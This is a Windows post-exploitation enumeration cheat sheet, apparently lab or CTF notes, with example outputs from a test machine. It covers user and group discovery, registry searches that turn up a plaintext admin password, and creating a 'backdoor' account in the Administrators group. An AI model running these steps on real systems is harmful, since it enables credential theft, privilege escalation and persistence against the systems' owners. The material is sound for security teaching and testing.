Windows Enumeration

Table of Contents

• Windows Enumeration
  • Table of Contents
  • Overview
  • Remote Access
    • RDP from Linux
      • RDP Example
  • System Information
    • Get Computer Name
    • Get OS Version
  • User Enumeration
    • Get Current User's SID and RID
    • Get List of All Local Users
    • Get Service by Caption
  • Group Enumeration
    • Get List of All Local Groups
    • Get List of Members of a Specific Group
    • Get All Groups a User Belongs To
    • Identify Administrator Accounts via Registry
  • Credential Hunting
    • Check Stored Credentials (Windows Credential Manager)
    • Search Registry for Passwords
      • Search Example
  • User Management
    • Create a New User
    • Add a User to a Group
    • Add User Example
  • References
    • Challenges
    • Web Sites

---

Overview

Post-exploitation enumeration commands for Windows systems, covering system information, user and group discovery, credential hunting, and basic user management.

Commands are provided in both CMD and PowerShell where applicable.

---

Remote Access

RDP from Linux

xfreerdp /v:TARGET_IP /u:USERNAME /p:PASSWORD

RDP Example

xfreerdp /v:10.12.15.23 /u:Peggy /p:g0u567

---

System Information

Get Computer Name

CMDPowerShell

:: CMD
echo %COMPUTERNAME%

:: Example
C:\Users\Peggy> echo %COMPUTERNAME%
COMPUTER-109

# PowerShell
$env:COMPUTERNAME

# Example
PS C:\Users\Peggy> $env:COMPUTERNAME
COMPUTER-109

Get OS Version

CMDPowerShell

:: CMD
systeminfo | findstr /B /C:"OS Name" /B /C:"OS Version"

:: Example
C:\Users\Peggy> systeminfo | findstr /B /C:"OS Name" /B /C:"OS Version"
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134

# PowerShell
(Get-WmiObject -Class Win32_OperatingSystem).Version

# Example
PS C:\Users\Peggy> (Get-WmiObject -Class Win32_OperatingSystem).Version
10.0.17134

---

User Enumeration

Get Current User's SID and RID

A SID (Security Identifier) uniquely identifies a user or group.

The RID (Relative Identifier) is the last numeric component of the SID and identifies the account within the domain.

RID value 500 is always the built-in Administrator; RID values 1000+ are regular user accounts.

S-1-5-21-4100474243-2059586340-3489691707-1001
│ │ │    └──────────────────────────────┘ └──┘
│ │ │          Three sub-authorities      RID
│ │ └─ Sub-authority class (21 = domain/local)
│ └─── Identifier authority (5 = NT)
└───── Literal prefix

CMDPowerShell

:: CMD — show current user SID
whoami /user

:: Example
C:\Users\Peggy> whoami /user

USER INFORMATION
----------------

User Name          SID
================== ==============================================
computer-109\peggy S-1-5-21-4100474243-2059586340-3489691707-1001

Literal Prefix: S-1
Identifier Authority: 5
Sub Authority Indicating the class of ID: 21
Three Sub Authorities for Uniqueness: 4100474243-2059586340-3489691707
Relative ID: 1001

# PowerShell — show SID and extract RID
$user = "USERNAME"
$sid = (Get-WmiObject Win32_UserAccount | Where-Object { $_.Name -eq $user }).SID
$rid = $sid.Split("-")[-1]
$sid
$rid

# Example
PS C:\Users\Peggy> $user = "Peggy"
$sid = (Get-WmiObject Win32_UserAccount | Where-Object { $_.Name -eq $user }).SID
$sid
$rid = $sid.Split("-")[-1]
$rid

S-1-5-21-4100474243-2059586340-3489691707-1001
1001

Get List of All Local Users

CMD

:: CMD
net users

:: Example
C:\Users\Peggy>net users

User accounts for \\COMPUTER-109

-------------------------------------------------------------------------------
Administrator            administrator2           DefaultAccount
Fred                     Gordon                   Guest
IMLUser                  Peggy                    WDAGUtilityAccount
The command completed successfully.

Get Service by Caption

To find the name of the service with the caption "Security Center":

1. Query all services using Get-WmiObject -Class Win32_Service.
2. Filter for the service where Caption matches "Security Center".
3. Display the Name, DisplayName, and State (running/stopped) of the service.

PowerShell

# PowerShell
Get-WmiObject -Class Win32_Service |
  Where-Object { $_.Caption -eq "Security Center" } |
  Select-Object -Property Name, DisplayName, State

# Example: Get name of the service with the caption "Security Center"
PS C:\Users\Peggy> Get-WmiObject -Class Win32_Service | Where-Object { $_.Caption -eq "Security Center" } | Select-Object -Property Name, DisplayName, State

Name   DisplayName     State
----   -----------     -----
wscsvc Security Center Running

---

Group Enumeration

Get List of All Local Groups

CMD

:: CMD
net localgroup

:: Example
C:\Users\Peggy>net localgroup

Aliases for \\COMPUTER-109

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Finance
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Marketing
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
*Remote Management Users
*Replicator
*Sales
*System Managed Accounts Group
*Users
The command completed successfully.

Get List of Members of a Specific Group

CMD

:: CMD
net localgroup GROUPNAME

:: Example: Get members of group "Sales"
C:\Users\Peggy>net localgroup Sales
Alias name     Sales
Comment

Members

-------------------------------------------------------------------------------
Gordon
The command completed successfully.

# PowerShell
Get-LocalGroupMember -Group "GROUPNAME"

# Example: Get members of group "Sales"
PS C:\Users\Peggy> Get-LocalGroupMember -Group "Sales"

ObjectClass Name                PrincipalSource
----------- ----                ---------------
User        COMPUTER-109\Gordon Local  

Get All Groups a User Belongs To

PowerShell

# PowerShell
Get-LocalGroup | ForEach-Object {
    $group = $_
    if ((Get-LocalGroupMember -Group $group.Name |
        Where-Object { $_.Name -eq "$env:COMPUTERNAME\USERNAME" })) {
        $group.Name
    }
}

# Example: Get all groups that Fred is a member of:
PS C:\Users\Peggy> Get-LocalGroup | ForEach-Object {
    $group = $_
    if ((Get-LocalGroupMember -Group $group.Name | Where-Object { $_.Name -eq "COMPUTER-109\Fred" })) {
        $group.Name
    }
}
Finance
Users

Identify Administrator Accounts via Registry

Administrator accounts can be identified by looking up SID-to-profile mappings in the registry under:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList

RID 500 is the built-in Administrator; any other account with a profile path under C:\Users\ is a user-created admin if it appears in the Administrators group.

Each subkey is a SID. Check ProfileImagePath to map SIDs to usernames:

(built-in)
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-4100474243-2059586340-3489691707-500 -> ProfileImagePath=C:\Users\Administrator

(user-created)
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-4100474243-2059586340-3489691707-1020 -> ProfileImagePath=C:\Users\administrator2

---

Credential Hunting

Check Stored Credentials (Windows Credential Manager)

CMD

:: CMD
cmdkey /list

:: Example: Check if there are any stored credentials
C:\Users\Peggy> cmdkey /list

Currently stored credentials:

* NONE *

Search Registry for Passwords

Registry keys sometimes contain plaintext passwords stored by applications or during setup.

CMD

:: CMD — search Local Machine hive
reg query HKLM /f password /t REG_SZ /s

:: CMD — search Current User hive
reg query HKCU /f password /t REG_SZ /s

:: CMD — search for a specific username
reg query HKLM /f USERNAME /t REG_SZ /s

Tip

Look for hits under HKLM\SYSTEM\Setup\ — credentials are sometimes stored there during first-boot configuration and never cleaned up.

Search Example

In this example, credentials are found for administrator2.

CMD

:: CMD
C:\Users\Peggy>reg query HKLM /f administrator2 /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\CrawlScopeManager\Windows\SystemIndex\DefaultRules\5
    URL    REG_SZ    file:///C:\[327290ed-ef22-409c-aeea-0d163d308bb7]\Users\administrator2\AppData\

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\CrawlScopeManager\Windows\SystemIndex\WorkingSetRules\5
    URL    REG_SZ    file:///C:\[327290ed-ef22-409c-aeea-0d163d308bb7]\Users\administrator2\AppData\

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\Gather\Windows\SystemIndex\Sites\LocalHost\Paths\4
    Path    REG_SZ    file:///C:\[327290ed-ef22-409c-aeea-0d163d308bb7]\Users\administrator2\AppData\

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Search\CrawlScopeManager\Windows\SystemIndex\DefaultRules\5
    URL    REG_SZ    file:///C:\[327290ed-ef22-409c-aeea-0d163d308bb7]\Users\administrator2\AppData\

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Search\CrawlScopeManager\Windows\SystemIndex\WorkingSetRules\5
    URL    REG_SZ    file:///C:\[327290ed-ef22-409c-aeea-0d163d308bb7]\Users\administrator2\AppData\

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Search\Gather\Windows\SystemIndex\Sites\LocalHost\Paths\4
    Path    REG_SZ    file:///C:\[327290ed-ef22-409c-aeea-0d163d308bb7]\Users\administrator2\AppData\

HKEY_LOCAL_MACHINE\SYSTEM\Setup\FirstBoot\Cleanup
    administrator2    REG_SZ    h0us323

End of search: 13 match(es) found.

---

User Management

These commands require an elevated CMD prompt (run as Administrator).

Create a New User

CMD

:: CMD
net user USERNAME PASSWORD /add

Add a User to a Group

CMD

:: CMD
net localgroup GROUPNAME USERNAME /add

Add User Example

Create a user and add it to the Administrators group.

CMD

:: CMD
net user backdoor P@ssw0rd /add
net localgroup Administrators backdoor /add

---

References

Challenges

Source	Name
N/A	N/A

Web Sites

• HackTricks — Windows Local Privilege Escalation
• PayloadsAllTheThings — Windows Privilege Escalation
• WinPEAS — Windows Privilege Escalation Awesome Scripts